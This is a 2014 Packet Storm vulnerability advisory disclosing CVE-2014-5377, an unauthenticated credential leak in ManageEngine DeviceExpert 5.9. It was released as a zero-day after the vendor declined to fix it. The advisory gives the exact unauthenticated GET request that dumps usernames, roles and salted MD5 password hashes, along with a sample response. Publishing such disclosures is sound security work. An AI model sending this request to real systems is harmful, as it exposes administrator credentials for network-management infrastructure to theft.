ManageEngine DeviceExpert 5.9 Credential Disclosure

2014-08-27T00:00:00
ID PACKETSTORM:128019
Type packetstorm
Reporter Pedro Ribeiro
Modified 2014-08-27T00:00:00

Description

                                        
                                            `Hi,  
  
You can read the usernames and MD5 hashed passwords of all the users  
in the Device Expert application by sending an unauthenticated  
request.  
I am releasing this as a 0 day as ManageEngine have responded that  
they do not consider this a priority and won't fix it in the near  
future unless a customer requests it. See details below.  
  
>> User credential disclosure in ManageEngine DeviceExpert 5.9  
>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security  
==========================================================================  
  
>> Background on the affected product:  
"DeviceExpert is a web–based, multi vendor network change,  
configuration and compliance management (NCCCM) solution for switches,  
routers, firewalls and other network devices. Trusted by thousands of  
network administrators around the world, DeviceExpert helps automate  
and take total control of the entire life cycle of device  
configuration management."  
  
  
>> Technical details:  
Vulnerability: User credential disclosure / CVE-2014-5377  
Constraints: no authentication or any other information needed.  
Affected versions: UNFIXED as of 27/08/2014 - current version 5.9  
build 5980 is vulnerable, older versions likely vulnerable  
  
GET /ReadUsersFromMasterServlet  
  
Example response:  
<?xml version="1.0"  
encoding="UTF-8"?><discoveryresult><discoverydata><username>admin</username><userrole>Administrator</userrole><password>Ok6/FqR5WtJY5UCLrnvjQQ==</password><emailid>noreply@zohocorp.com</emailid><saltvalue>12345678</saltvalue></discoverydata></discoveryresult>  
  
The passwords are a salted MD5 hash.  
  
A copy of this advisory is available at my repo:  
https://raw.githubusercontent.com/pedrib/PoC/master/me_deviceexpert-5.txt  
  
Regards,  
Pedro  
  
  
`